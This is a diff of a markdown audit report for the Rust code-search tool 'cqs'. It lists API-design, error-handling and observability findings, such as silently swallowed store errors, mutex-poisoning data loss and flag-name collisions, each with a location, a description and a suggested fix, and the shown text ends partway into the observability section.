-Summary: 10 API-design findings, all verified against live `cqs v1.29.0`. Dominant classes: (1) top-level `--json` silently dropped on non-flattened subcommands (`project list/remove`, `ref add/remove/update`, `telemetry --reset`), (2) CLI↔daemon-batch shape drift (`dispatch_drift` path separators, `NotesListArgs` missing `--check`, pretty-vs-compact JSON), (3) missing CLI surface for a daemon-only verb (`refresh`/`invalidate`), (4) flag-name/short-flag inconsistencies across commands that share semantics (`eval --limit` no `-n`, `--expand` vs `--expand-parent`, `--depth` short-flag asymmetry).
+#### `pub use nl::*` leaks dead `generate_nl_with_call_context` wrapper into the lib API
+- **Difficulty:** easy
+- **Location:** `src/lib.rs:165` (`pub use nl::*`); `src/nl/mod.rs:43-59` (`generate_nl_with_call_context` — five-arg wrapper around the seven-arg `_and_summary` variant).
+- **Description:** `generate_nl_with_call_context` exists only as a thin wrapper that hard-codes `summary = None, hyde = None` and calls `generate_nl_with_call_context_and_summary`. Production code has zero callers — verified with `grep -rn 'generate_nl_with_call_context\b' src/ | grep -v '/nl/mod.rs:'` returns empty. Only the tests in `src/nl/mod.rs` use it. It's `pub` and re-exported via `pub use nl::*`, so it's part of the lib's public API surface. Not just dead code — it's dead public API, which is worse because removing it later is a "breaking" change in any consumer that picked it up. Same anti-pattern likely lurks under the other ten `pub use foo::*` glob re-exports in `src/lib.rs`.
+- **Suggested fix:** Drop `generate_nl_with_call_context` outright (only the test sites need to be updated to call `_and_summary` with `None, None`). Then audit all eleven `pub use foo::*` lines in `src/lib.rs` (`diff`, `gather`, `impact`, `nl`, `onboard`, `project`, `related`, `scout`, `search`, `task`, `where_to_add`) — replace each with explicit `pub use foo::{...}` lists naming the items the lib actually wants to publish. Glob re-exports are a footgun for surface control: every new `pub fn` in any of those modules joins the public API automatically.
 
----
+#### `cqs gather --expand <N>` and `cqs --expand-parent` collide on a high-traffic flag name
+- **Difficulty:** easy
+- **Location:** top-level `src/cli/definitions.rs:Cli::expand_parent` (flag `--expand-parent`, parent-context expansion, `bool`); `src/cli/args.rs:GatherArgs::expand` (flag `--expand`, call-graph BFS depth, `usize`); the v1.30.0 fix renamed `SearchArgs::expand` to `expand_parent` with `--expand` as a visible alias for back-compat.
+- **Description:** `cqs gather foo --expand 3` (graph depth) and `cqs foo --expand-parent` (parent-context `bool`) both accept the substring `--expand`. The v1.30.0 fix made `SearchArgs::expand` an alias for `expand_parent`, but `GatherArgs::expand` is still a distinct usize-typed flag. `cqs --expand 2 gather foo` parses `--expand 2` against the *top-level* `Cli` first — and there's no top-level `--expand`, so it errors, but the error doesn't say "did you mean `--expand-parent` (top-level) or did you mean to pass `--expand 2` after `gather`?" The dual semantic (bool parent-context vs usize call-graph depth) under similar flag names is the original API-V1.22-3 footgun that motivated the rename — it's only half-fixed.
+- **Suggested fix:** Rename `GatherArgs::expand` to `--graph-depth` (or `--depth` to match `onboard`/`impact`/`test-map` which all already use `--depth` for the same call-graph concept post-v1.30.0). That eliminates the `--expand` collision entirely and aligns the four call-graph-depth-taking commands under one flag name. Ship as hard rename — no external users.
+
+#### `cqs eval` `--save` accepts a path with no `.json` validation; output JSON is hard-coded
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/eval/mod.rs:EvalCmdArgs::save` (`Option<PathBuf>`).
+- **Description:** `cqs eval queries.json --save report` writes a JSON report to a file literally named `report` (no extension). The flag is `Option<PathBuf>` with no validation, no extension default, no warning. `cqs eval` is the eval harness — a sloppy filename in a release-comparison workflow turns into "did I overwrite my baseline?" guessing. Compare `cqs eval --baseline report` which requires the path exist, contrasted with `--save` which just overwrites. Asymmetric input/output validation on a command meant for release-gate comparisons.
+- **Suggested fix:** When `--save <path>` lacks an extension, append `.json` automatically (with a one-line stderr note). When it has the wrong extension (`.txt`, `.yaml`), error out — eval reports are JSON-only. Mirrors the validation `cqs train-data --output <path>` should also have but doesn't.
+
+Summary: 0 findings carried forward (all 10 archived findings were fixed in v1.30.0 — verified via direct source reads of `src/cli/commands/infra/{project,reference,telemetry_cmd,model}.rs`, `src/cli/args.rs:NotesListArgs`, `src/cli/batch/handlers/misc.rs`, `src/cli/dispatch.rs:try_daemon_query`, `src/cli/definitions.rs:Refresh`, `src/cli/commands/eval/mod.rs:EvalCmdArgs::limit`); 9 new findings, 10 archived findings dropped as fixed.
+
 
 ## Error Handling
 
-#### `cli/commands/io/brief.rs::build_brief_data` silently swallows 3 consecutive store errors, producing zeroed counts with no signal
-- **Difficulty:** medium
-- **Location:** `src/cli/commands/io/brief.rs:59-75`
-- **Description:** Three back-to-back store queries each do `.unwrap_or_else(|e| { tracing::warn!(...); <empty> })`:
+Findings target code paths added in v1.29.x → v1.30.0 (cache+slots #1105, local-LLM provider #1101, serve auth #1118, command registry #1114, non-blocking HNSW #1113, embedder Phase A #1120). Items already triaged in `docs/audit-triage-v1.30.0.md` (EH-V1.29-1..10) are explicitly skipped.
+
+#### `LocalProvider::submit_via_chat_completions` silently loses every batch result on Mutex poisoning
+- **Difficulty:** easy
+- **Location:** `src/llm/local.rs:155, 196, 271-279, 305, 545`
+- **Description:** `LocalProvider` (PR #1101) drives the local LLM batch via per-thread workers that share a `Mutex<HashMap<String, String>> results` accumulator. Every single store-side and finalization step uses `.lock().unwrap()` or `if let Ok(mut g) = lock.lock()` and silently drops the poison case. Specifically:
+  - Line 196: `if let Ok(mut map) = results_ref.lock() { map.insert(...) }` — if a *prior* worker's panic poisoned the lock, every subsequent successful item is silently dropped (`Ok(Ok(Some(text)))` branch becomes a no-op).
+  - Line 271-272, 278-279: `let ok = *succeeded.lock().unwrap();` etc. — first poisoned lock crashes the batch.
+  - **Worst case at line 305**: `let results_map = results.into_inner().unwrap_or_default();` — `Mutex::into_inner` returns `LockResult`. On poison, `unwrap_or_default()` quietly substitutes an **empty `HashMap`**, then writes that into the stash. `submit_via_chat_completions` then logs `"local batch complete"` with the real (truthful) succeeded/failed counts and returns the batch_id. The user later calls `fetch_batch_results(batch_id)` and gets `{}` — *all results lost* — with no error, no warning, and no signal that the count `succeeded` ≠ map size. Combined with the `Ok("ended")` from `check_batch_status`, the doc/HyDE pipelines treat this as a successful empty batch (every chunk's "summary failed silently") and persist nothing.
+- **Suggested fix:** (1) Replace `Mutex::into_inner().unwrap_or_default()` at line 305 with `match results.into_inner() { Ok(m) => m, Err(p) => { tracing::error!(succeeded = ok, "results mutex poisoned during batch — recovering inner state"); p.into_inner() } }` so the partially-populated map is preserved. (2) Add a post-finalize invariant check: `if results_map.len() != ok { return Err(LlmError::Internal(format!("batch accounting drift: ok={ok} map_len={}", results_map.len()))); }` so accounting drift surfaces instead of silently shipping a short stash. (3) Audit-mode rule: every `*foo.lock().unwrap()` in worker hot paths gets either `expect("…")` with a meaningful message or explicit `into_inner()` recovery — `unwrap()` was forbidden in this codebase per CLAUDE.md.
+
+#### `dispatch::try_daemon_query` warns user about daemon protocol error then silently re-runs the same command in CLI
+- **Difficulty:** easy
+- **Location:** `src/cli/dispatch.rs:445-462, 199-204`
+- **Description:** When the daemon responds with a non-`ok` status (EH-13's "protocol error" branch), the function logs a warning, prints `cqs: daemon error: <msg>` and a hint to set `CQS_NO_DAEMON=1` — then returns `None`. The caller at `:200` interprets `None` uniformly as "fall back to CLI", so the CLI re-executes the *same* command moments later. The user sees the daemon error *and* the CLI's output for what should have been a single query. Two failure modes follow: (a) a daemon-only feature (e.g. a slot the daemon owns but the CLI re-resolves to a different active slot) returns a different result than the daemon would have, and the user has no way to tell which run their pipeline consumed; (b) write-side commands that the daemon refused for safety reasons get re-run from the CLI which may not have the same gating. The comment at line 459 — `"Still return None so we fall through to CLI path, but the user has been told why — no silent fallback"` — explicitly contradicts the EH-13 fix premise quoted at line 445-449 ("Falling back to CLI now would mask daemon bugs").
+- **Suggested fix:** Either (a) propagate the daemon error: change `try_daemon_query` to return `Result<Option<String>, anyhow::Error>` and bubble protocol errors up so dispatch exits non-zero with the daemon's message — matching the comment's intent; or (b) keep the fallthrough but wire a sticky `daemon_error_seen: bool` so the CLI path's output is prefixed with `WARN: daemon errored ("…"); falling back — results may differ` rather than silently producing a "second" result the user never asked for.
+
+#### `LocalProvider::fetch_batch_results` returns empty map on missing batch_id with no error — masks producer/consumer mismatch
+- **Difficulty:** easy
+- **Location:** `src/llm/local.rs:542-547`
+- **Description:**
+  ```rust
+  fn fetch_batch_results(&self, batch_id: &str) -> Result<HashMap<String, String>, LlmError> {
+      let mut stash = self.stash.lock().unwrap();
+      Ok(stash.remove(batch_id).unwrap_or_default())
+  }
+  ```
+  The doc-comment says "returning empty if the id was already fetched or never existed". This collapses three distinct conditions — *id never existed*, *id was double-fetched*, *id existed but the worker pool dropped its results* (see prior finding) — into the same `Ok(HashMap::new())` reply. The summary/doc-gen loops at `src/llm/summary.rs` and `src/llm/doc_comments.rs` then commit zero rows for the affected batch and move on, with the only signal being a divergence between the `succeeded` count logged at submission and the row count actually persisted. There is no `tracing::warn!` on the missing-id path.
+- **Suggested fix:** Replace with explicit error variants: `match stash.remove(batch_id) { Some(m) => Ok(m), None => Err(LlmError::Internal(format!("local batch_id {batch_id} not found in stash — already fetched or submission silently lost results"))) }`. Add a `LlmError::BatchNotFound(String)` variant so callers can distinguish "double fetch" from a real provider error and either retry or surface the drift to the operator.
+
+#### Embedder model fingerprint silently falls back to `repo:timestamp` — invalidates entire embedding cache on hash failure
+- **Difficulty:** easy
+- **Location:** `src/embedder/mod.rs:435-466`
+- **Description:** When `model_fingerprint()` (the cache-key seed for the project-scoped embeddings cache, PR #1105) cannot stream-hash the ONNX file, three nested error arms fall back to `format!("{}:{}", self.model_config.repo, ts)`. `ts` is `SystemTime::now()` — **a different value every run**. The `EmbeddingCache` keys entries by `(content_hash, model_id)` where `model_id` is built from this fingerprint. Result: every time fingerprint hashing fails (transient I/O hiccup, AV scanner holding the file open on Windows, EBUSY), every chunk re-embeds against a brand-new model_id and the cache delivers 0% hit rate without surfacing a single signal to `cqs cache stats` or `cqs index`. Operators see "5 GB cache, growing every reindex" and the only diagnostic is the warn line buried in the journal. This also bloats the cache forever — old `repo:ts1` entries remain, never revisited, until `cqs cache prune --model 'repo:ts1'` (which the operator wouldn't know to run).
+- **Suggested fix:** Promote the hash failure to a hard error: change the fingerprint type to `Result<String, EmbedderError>` and propagate via `?`. The cost (no cache hit on a single bad reindex) is dramatically lower than the silent-storm cost. If a fallback is desired for legacy compatibility, hash a stable proxy (file path + file size + mtime — all syscalls that don't read content) instead of `now()`, so retries within the same `mtime` window reuse the same cache. Either way, surface a `cqs doctor` warning when the stored model_id has the `repo:<ts>` shape, since that's a signal of broken cache.
+
+#### Pattern: `serde_json::to_value(...).unwrap_or_else(|_| json!({}))` in impact/format.rs and 4 sibling sites silently turns serialization bugs into empty output
+- **Difficulty:** easy
+- **Location:** `src/impact/format.rs:11-16, 101-106`; `src/cli/commands/io/context.rs:94-97, 320-323, 498-501`; `src/cli/commands/io/blame.rs:240-243`
+- **Description:** Six call sites use the pattern:
+  ```rust
+  serde_json::to_value(&output).unwrap_or_else(|e| {
+      tracing::warn!(error = %e, "Failed to serialize ...");
+      serde_json::json!({})
+  })
+  ```
+  The output value is the *entire* result of the command (impact graph, context bundle, blame data). On any `Serialize` impl bug — typically only triggered after a refactor adds a non-serializable field — the user receives `{}` as the JSON envelope payload. An agent piping `cqs impact foo --json | jq '.callers'` gets `null` and treats it as "no callers" rather than "serialization broke and you need to file a bug." Combined with `dispatch_diff` / `dispatch_impact` paths, an entire batch handler can return `{}` for every input and the agent never sees a real error. `serde_json::to_value` only fails on `Serialize` impl bugs (and a few overflow cases) — these are programmer errors, not runtime conditions, and silencing them violates the "no silent failure" principle codified in EH-V1.29-9.
+- **Suggested fix:** Switch all six to `serde_json::to_value(&output)?` and propagate. The function signatures (`impact_to_json`, `build_*_output`) currently return `Value`; bumping them to `Result<Value, serde_json::Error>` is a single-character touch at each callsite — they all already terminate in `crate::cli::json_envelope::emit_json(&obj)?` which already handles `Result`. Programmer errors should fail loud, not produce `{}` and a journal warn the operator never reads.
+
+#### `cache_cmd::cache_stats` silently treats `QueryCache::open` failure as "0 bytes" — operator can't tell empty cache from broken cache
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/cache_cmd.rs:120-139`
+- **Description:** New cache subcommand (PR #1105) reports the QueryCache file's size alongside the embedding cache. The lookup is wrapped in a `match QueryCache::open(...) { Ok(qc) => qc.size_bytes()..., Err(e) => { tracing::warn!(...); 0 }}`. When the QueryCache is locked by another process, has bad permissions, or hit a schema migration error, the JSON envelope reports `query_cache_size_bytes: 0` exactly as if the file was empty, and `cqs cache stats --json` consumers (the docs explicitly call this out as a P3 #124 fix) can't tell the difference. Same anti-pattern called out in EH-V1.29-7 (`EmbeddingCache::stats`) but on the new sibling code.
+- **Suggested fix:** Add a `query_cache_status: "ok" | "missing" | "error: <message>"` field to the JSON envelope and print a one-line `Query cache: <error>` next to the size on the text path. Don't reuse the success-shaped numeric field for failure.
+
+#### `slot_remove` masks `list_slots` failure as "the only slot remaining" — bails with confusing message instead of the real I/O error
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/slot.rs:303-313`
+- **Description:**
+  ```rust
+  let active = read_active_slot(...).unwrap_or_else(|| DEFAULT_SLOT.to_string());
+  let mut all = list_slots(project_cqs_dir).unwrap_or_default();    // <-- swallows StoreError
+  all.retain(|n| n != name);
+  if name == active {
+      if all.is_empty() {
+          anyhow::bail!("Refusing to remove the only remaining slot '{}'. Create another slot first.", name);
+      }
+      ...
+  }
+  ```
+  If `list_slots` fails (slots/ readdir fails, permission denied), `all` is `vec![]`, then `retain` does nothing, then the active-slot branch fires with "Refusing to remove the only remaining slot" — even though ten slots may exist on disk. Operator sees a contradiction with `cqs slot list` output and has no way to debug. Same pattern at `src/cli/commands/infra/slot.rs:273, 304, 313` and `src/cli/commands/infra/doctor.rs:923`.
+- **Suggested fix:** Propagate with `?` (the function already returns `Result<()>` via anyhow): `let mut all = list_slots(project_cqs_dir).context("Failed to list slots while validating remove")?;`. Same change for the three other sites — none of them are on a "best-effort" path where empty-on-error is semantically correct.
+
+#### `build_token_pack` swallows `get_caller_counts_batch` failure with no warnings field
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/io/context.rs:438-441`
+- **Description:**
   ```rust
   let caller_counts = store.get_caller_counts_batch(&names).unwrap_or_else(|e| {
-      tracing::warn!(error = %e, "Failed to fetch caller counts");
+      tracing::warn!(error = %e, "Failed to fetch caller counts for token packing");
       HashMap::new()
   });
-  let graph = store.get_call_graph().unwrap_or_else(|e| {
-      tracing::warn!(error = %e, "Failed to load call graph for test counts");
-      std::sync::Arc::new(cqs::store::CallGraph::from_string_maps(...))
-  });
-  let test_chunks = store.find_test_chunks().unwrap_or_else(|e| {
-      tracing::warn!(error = %e, "Failed to find test chunks");
-      std::sync::Arc::new(Vec::new())
-  });
+  let (included, used) = pack_by_relevance(chunks, &caller_counts, budget, &embedder);
   ```
-  If any store query fails, `cqs brief <path>` returns a `BriefData { caller_counts: 0, test_counts: 0 }` with no flag indicating partial data. An agent reading the JSON cannot distinguish "this function genuinely has no callers or tests" from "the call-graph query failed". `BriefData` has no `warnings`/`partial` field. This is the anti-pattern called out in MEMORY.md (`.unwrap_or_default()` swallowing store errors).
-- **Suggested fix:** Either (a) propagate with `?` so the command errors out and the agent knows to retry, or (b) add a `warnings: Vec<String>` field to `BriefData` / `BriefOutput` that records which store queries degraded, and surface it in both the JSON envelope and the terminal output.
+  `pack_by_relevance` ranks chunks by caller count to pack the highest-value ones first into the token budget. With an empty `caller_counts` map, every chunk ties at "0 callers" and packing degrades to whatever stable-sort fallback kicks in — typically file-order. The agent receives a token-packed context that *looks* correct (right token count, right shape) but selected the *wrong* chunks. Sibling functions in the same file (`build_full_data`) carry a `warnings` field; this one is missed in the EH-V1.29-9 sweep. There is no signal — JSON or text — that ranking degraded.
+- **Suggested fix:** Either propagate (`build_token_pack` already returns `Result`), or thread a `warnings: &mut Vec<String>` parameter through, push `"caller_counts query failed: {e}; token-pack ranking degraded to file-order"`, and have the caller include it in the typed output struct. The propagation path is one keystroke (`?`) and is the right call here — packing without ranking signal is worse than failing the command.
 
-#### `ci::run_ci_analysis` silently downgrades dead-code-scan failure into "0 dead" with no flag
+#### `read --focus` silently empties `type_chunks` on store batch failure — focused read returns chunk with no type definitions
 - **Difficulty:** easy
-- **Location:** `src/ci.rs:100-128`
-- **Description:** The dead-code scan is wrapped in a `match store.find_dead_code(true) { Ok(...) => ..., Err(e) => { tracing::warn!(error = %e, "Dead code detection failed — CI will report 0 dead code (not 'scan passed')"); Vec::new() }}`. `CiReport` has `dead_in_diff: Vec<DeadInDiff>` but no `dead_scan_ok: bool` / `warnings` field. A CI consumer reading the JSON output cannot distinguish "no dead code in diff" from "dead-code scan crashed". The gate evaluation in `evaluate_gate` only looks at `risk_summary`, so a dead-code query failure never fails the gate — meaning a CI run whose index is unreadable will green-light on the dead-code dimension even though no scan happened. Given the tracing::warn! message already admits the ambiguity ("not 'scan passed'"), the JSON should expose the same signal.
-- **Suggested fix:** Add a `dead_scan_ok: bool` (or `warnings: Vec<String>`) field to `CiReport`; set it `false` on the Err arm. Optionally short-circuit `gate.passed = false` on `dead_scan_ok == false` when threshold != Off, so CI fails loud on the query error rather than fooling the reviewer.
+- **Location:** `src/cli/commands/io/read.rs:230-235`
+- **Description:** Same `unwrap_or_else(|e| { tracing::warn!(...); HashMap::new() })` pattern as the EH-V1.29-9 family but in `read --focus`. Output struct `FocusedReadOutput` does not currently carry a `warnings` field. An agent calling `cqs read --focus my_fn --json` to gather `my_fn` plus its type dependencies receives the function body alone with no signal that the type lookup failed — the agent then makes downstream decisions based on "no relevant type defs exist" when the truth was a transient store error.
+- **Suggested fix:** Mirror the `SummaryOutput::warnings` pattern from `cli/commands/io/context.rs:464`. Add `#[serde(skip_serializing_if = "Vec::is_empty")] warnings: Vec<String>` to the focused-read output and push `"search_by_names_batch failed: {e}; type definitions omitted"` on the warn arm. This finding parallels the existing pattern call-out (EH-9 in the prior batch1 file) but specifically for the `read --focus` command which was missed in the v1.29.x sweep.
 
-#### `dispatch::try_daemon_query` silently falls back to CLI when daemon output re-serialization fails
+#### `serve::data::build_chunk_detail` collapses NULL `signature` and `content` columns to empty string — UI can't tell "missing chunk body" from "empty function"
 - **Difficulty:** easy
-- **Location:** `src/cli/dispatch.rs:785-790`
+- **Location:** `src/serve/data.rs:488-492`
 - **Description:**
   ```rust
-  let output = resp.get("output")?;
-  let text = match output {
-      serde_json::Value::String(s) => s.clone(),
-      other => serde_json::to_string(other).ok()?,
-  };
-  return Some(text);
+  let signature: String = row.get::<Option<String>, _>("signature").unwrap_or_default();
+  let doc: Option<String> = row.get("doc");
+  let content: String = row.get::<Option<String>, _>("content").unwrap_or_default();
   ```
-  Two silent `?` exits: (1) `resp.get("output")?` returns None if the daemon sent `status: ok` but no `output` field, (2) `serde_json::to_string(other).ok()?` drops the serialization error entirely. Both short-circuit to `None`, which in turn causes silent fallback to CLI re-execution — exactly the "silently swallow daemon-reported problems" class of bug that EH-13 fixed for error statuses. The daemon path gives 3-19ms responses; the CLI re-runs pay the ~2s startup cost. Silent fallback masks daemon JSON bugs and denies operators latency signal.
-- **Suggested fix:** Replace both with explicit `tracing::warn!(stage = "parse", "Daemon ok response missing/unserializable output — falling back to CLI")` before returning `None` (the pattern already used for bad status at line 766-772 and error responses at line 798-803). No need to change the fallback semantics, just the silence.
+  `doc` is correctly typed as `Option<String>` so the UI sees `null` vs `""`. `signature` and `content` get the same nullable column treatment in SQL but are coerced to `""` here. The UI's chunk-detail sidebar then shows a chunk with **no signature line and no body** — visually identical to an empty function. The `#[derive(Serialize)] ChunkDetail { signature: String, content: String }` typing makes this fix mechanical: change to `Option<String>` and handle `None` in the JS so the user can see "<missing — DB column NULL>" rather than a blank pane that looks like correct rendering of an empty struct. Real-world cause: a partial write during indexing (SIGKILL between INSERT phases) where the chunk row exists but content didn't make it.
+- **Suggested fix:** Change both fields on `ChunkDetail` to `Option<String>`, drop the `unwrap_or_default()`. Update `serve/assets/views/chunk-detail.js` to render `null` as a `<missing>` placeholder rather than the empty string. NULL in SQL is a real signal — flattening it loses the diagnostic.
 
-#### `cli/commands/io/blame.rs::build_blame_data` silently suppresses callers fetch failure
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/io/blame.rs:52-59`
-- **Description:**
-  ```rust
-  let callers = if show_callers {
-      store.get_callers_full(&chunk.name).unwrap_or_else(|e| {
-          tracing::warn!(error = %e, name = %chunk.name, "Failed to fetch callers");
-          Vec::new()
-      })
-  } else { Vec::new() };
-  ```
-  `BlameData` then returns `callers: Vec::new()` to the caller. User ran `cqs blame foo --show-callers`; they get zero callers back with no indication the store query failed. `BlameData` has no partial-data flag. Same class as brief.rs above — the explicit tracing::warn! acknowledges that the user-facing signal is missing but doesn't fix it.
-- **Suggested fix:** Either propagate via `?` so `cqs blame --show-callers` errors out cleanly, or add a `callers_query_failed: bool` / `warnings: Vec<String>` field on `BlameData` / the emitted JSON, and print a `Warning: callers query failed` line on the text path so agents and humans see the same signal the journal sees.
-
-#### `suggest::generate_suggestions` silently skips dedup against existing notes on store error
-- **Difficulty:** easy
-- **Location:** `src/suggest.rs:62-65`
-- **Description:**
-  ```rust
-  let existing = store.list_notes_summaries().unwrap_or_else(|e| {
-      tracing::warn!(error = %e, "Failed to load existing notes for dedup");
-      Vec::new()
-  });
-  ```
-  If the notes query fails, `existing` is empty, and the dedup `.retain()` below does nothing. `cqs suggest` then returns suggestions that duplicate notes the user already has — and nothing in the response signals that dedup was skipped. Because `cqs suggest --apply` reindexes notes, this can silently generate duplicate note rows when the store glitches mid-call.
-- **Suggested fix:** Propagate the error (the caller already returns `Result<Vec<SuggestedNote>, StoreError>`, so switching to `?` is a one-character change), or add a `dedup_skipped: bool` field to the output struct. Propagation is the low-friction fix since this function is not user-agent facing directly.
-
-#### `where_to_add::suggest_placement_with_options_core` silently drops pattern data on batch fetch failure
-- **Difficulty:** easy
-- **Location:** `src/where_to_add.rs:208-214`
-- **Description:**
-  ```rust
-  let mut all_origins_chunks = match store.get_chunks_by_origins_batch(&origin_refs) {
-      Ok(m) => m,
-      Err(e) => {
-          tracing::warn!(error = %e, "Failed to batch-fetch file chunks for pattern extraction");
-          HashMap::new()
-      }
-  };
-  ```
-  On failure, every file suggestion emerges with empty `LocalPatterns` (no imports, empty error-handling string, empty naming convention, `has_inline_tests: false`). An agent using `cqs where` for placement guidance would follow empty patterns into wrong conventions without realizing the pattern extraction failed. `PlacementResult` has no `warnings` field to signal partial data.
-- **Suggested fix:** Propagate with `?` (the function already returns `Result<PlacementResult, AnalysisError>`). If propagation is undesirable because the file-scoring result is still useful on its own, add a `patterns_degraded: bool` field to `PlacementResult` and set each `LocalPatterns` to `None`/a sentinel so consumers can tell empty-because-no-data from empty-because-we-didn't-look.
-
-#### `cache::EmbeddingCache::stats` aggregates 5 silent per-query failures into a single lying `CacheStats`
-- **Difficulty:** easy
-- **Location:** `src/cache.rs:408-461`
-- **Description:** Five separate `unwrap_or_else(|e| { tracing::warn!(...); 0 /* or None */ })` calls inside `stats()`:
-  ```rust
-  let total_entries: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM embedding_cache").fetch_one(...).await.unwrap_or_else(|e| { ...; 0 });
-  let total_size: i64 = sqlx::query_scalar("SELECT page_count * page_size ...").fetch_one(...).await.unwrap_or_else(|e| { ...; 0 });
-  let unique_models: i64 = sqlx::query_scalar(...).fetch_one(...).await.unwrap_or_else(|e| { ...; 0 });
-  let oldest: Option<i64> = sqlx::query_scalar(...).fetch_one(...).await.unwrap_or_else(|e| { ...; None });
-  let newest: Option<i64> = sqlx::query_scalar(...).fetch_one(...).await.unwrap_or_else(|e| { ...; None });
-
-  Ok(CacheStats { total_entries: total_entries as u64, total_size_bytes: total_size as u64, ... })
-  ```
-  The return type is `Result<CacheStats, CacheError>` — but it can never be `Err` despite the Ok path silently masking up to five independent query failures. `cqs cache stats --json` would report `total_entries: 0` on a corrupt/locked DB and look indistinguishable from an empty cache. An operator debugging cache issues via `cqs cache stats` sees a lie. No `warnings`/`degraded` field on `CacheStats`.
-- **Suggested fix:** Change all five to `?` propagation so `stats()` returns `Err(CacheError)` on any query failure (the simplest fix — callers already handle Err). If per-field tolerance is desired, convert the five fields to `Option<u64>` with explicit None on error and surface a `warnings: Vec<String>` field.
-
-#### Daemon startup/periodic GC silently treats poisoned `gitignore` RwLock as "no matcher" — re-indexes ignored files
-- **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:1737, 1945`
-- **Description:**
-  ```rust
-  // 1737 (startup GC) and 1945 (periodic GC)
-  let matcher_guard = gitignore.read().ok();
-  let matcher_ref = matcher_guard.as_ref().and_then(|g| g.as_ref());
-  run_daemon_startup_gc(&store, &root, &parser, matcher_ref);
-  ```
-  `RwLock::read()` returns `LockResult`; `.ok()` only yields `None` when the lock is **poisoned** (panic occurred while holding write lock). Poison is a serious invariant violation — but here it's silently converted to `matcher_ref = None`, which makes `run_daemon_startup_gc` / `run_daemon_periodic_gc` run with no gitignore filtering. The GC pass will treat previously-ignored files as candidates for re-indexing, re-populating the index with paths the user explicitly excluded. No tracing::warn! on the poison path. The only signal is the sudden explosion of chunk counts.
-- **Suggested fix:** Replace `.ok()` with:
-  ```rust
-  let matcher_guard = match gitignore.read() {
-      Ok(g) => Some(g),
-      Err(poisoned) => {
-          tracing::error!("gitignore RwLock poisoned, recovering — indexing may include previously-ignored paths this tick");
-          Some(poisoned.into_inner())
-      }
-  };
-  ```
-  Using `into_inner()` keeps the previously-written matcher visible rather than running GC with no filter at all, and the error log makes the daemon journal show the poison event.
-
-#### `convert::pdf.rs::find_pdf_script` and `convert::chm.rs`-style zip-slip: `.ok()` hides permission-denied from walker
-- **Difficulty:** medium
-- **Location:** `src/cli/commands/io/read.rs:232-235` (related pattern), and generally anywhere `sqlx` results are `.unwrap_or_else(..., HashMap::new())`
-- **Description:** This is a *pattern finding*, not one site. Several user-facing commands (`read --focus`, `brief`, `blame`, `suggest`, `where`) follow the idiom:
-  ```rust
-  let batch_results = store.some_batch_query(...)
-      .unwrap_or_else(|e| { tracing::warn!(error = %e, "..."); HashMap::new() });
-  ```
-  On store query failure, every downstream operation silently produces empty results. The pattern is ergonomic and logs a warn, but the output schema has no way to signal partial data to the agent consumer. An agent running `cqs where "add caching"` and seeing empty LocalPatterns doesn't know whether to re-run, widen the search, or abandon the task. Past audits (EH-10, EH-11) fixed the same class for the ingest pipeline by re-buffering on failure; the user-facing commands should follow suit by at least adding a `warnings` / `partial: bool` field to each output struct.
-- **Suggested fix:** Introduce a project-wide convention: every struct serialized to JSON gets an optional `#[serde(skip_serializing_if = "Vec::is_empty")] warnings: Vec<String>` field. When an `unwrap_or_else(..., empty)` fires with a `tracing::warn!`, also push a one-line human string onto `warnings`. This is a mechanical sweep across ~6 commands (brief, blame, suggest, where, scout, task) and mirrors the `ScoutResult::search_degraded` + `expansion_capped` pattern that already exists (used at `src/cli/commands/search/gather.rs:199-207`). Adopting that pattern consistently would close this entire class.
-
-#### `cagra::CagraIndex::delete_persisted` discards both `remove_file` errors silently, no log
-- **Difficulty:** easy
-- **Location:** `src/cagra.rs:1097-1102`
-- **Description:**
-  ```rust
-  pub fn delete_persisted(path: &Path) {
-      let _span = tracing::debug_span!("cagra_delete_persisted", path = %path.display()).entered();
-      let _ = std::fs::remove_file(path);
-      let _ = std::fs::remove_file(meta_path_for(path));
-  }
-  ```
-  Doc-comment says "Best-effort — missing files are treated as success". The problem is that *real* I/O errors (EACCES, EBUSY, disk full) are indistinguishable from `NotFound` here — both are silently discarded. The only caller (`src/cli/store.rs:365`) uses this to clean up after a load failure before rebuilding; if the remove fails with EACCES, the next daemon restart hits the same corrupt-sidecar path and logs the same warn every boot indefinitely with no operator signal that cleanup itself is failing. `let _ =` here gives up more than necessary — `ErrorKind::NotFound` is the only expected failure mode that should be suppressed.
-- **Suggested fix:**
-  ```rust
-  pub fn delete_persisted(path: &Path) {
-      let _span = tracing::debug_span!("cagra_delete_persisted", path = %path.display()).entered();
-      for p in [path.to_path_buf(), meta_path_for(path)] {
-          match std::fs::remove_file(&p) {
-              Ok(()) => {}
-              Err(e) if e.kind() == std::io::ErrorKind::NotFound => {}
-              Err(e) => tracing::warn!(path = %p.display(), error = %e,
-                  "CAGRA cleanup failed — next rebuild may re-hit the same corrupt blob"),
-          }
-      }
-  }
-  ```
-
----
 
 ## Observability
 
-#### `Reranker::rerank()` lacks entry span — the `rerank_with_passages()` wrapper has one but the shortcut path doesn't
-- **Difficulty:** easy
-- **Location:** `src/reranker.rs:160`
-- **Description:** `Reranker::rerank` is the canonical public reranker API. It does NOT call `rerank_with_passages` — instead it fetches passages from results and calls `compute_scores` directly (see lines 177-181). Consequently the hot cross-encoder path has no span, while the seldom-used `rerank_with_passages` (line 197) has a `tracing::info_span!("rerank", count, limit, query_len)`. If a reranker regression shows up in journal logs (non-finite scores, timeout, session poison), the primary entry path is untagged and hard to correlate with the caller. A single tracing journal line "reranker took 850ms" can't be attributed to a specific search invocation without a parent span.
-- **Suggested fix:** Add `let _span = tracing::info_span!("rerank", count = results.len(), limit, query_len = query.len()).entered();` at the top of `pub fn rerank` (line 165-166). Mirrors the span already present in `rerank_with_passages`.
+Coverage is broadly excellent in v1.30.0 — the v0.12.1 lesson has been applied across all post-v0.9.7 modules and v1.30.0 additions (`slot`, `cache`, `serve`, embedder/provider). Previously-flagged OB-V1.29-1 through OB-V1.29-7 are now fixed. Below are NEW observability gaps not in `audit-triage-v1.30.0.md`.
 
-#### `serve::build_chunk_detail` and `build_stats` lack `tracing::info_span!` — the other three `build_*` have them
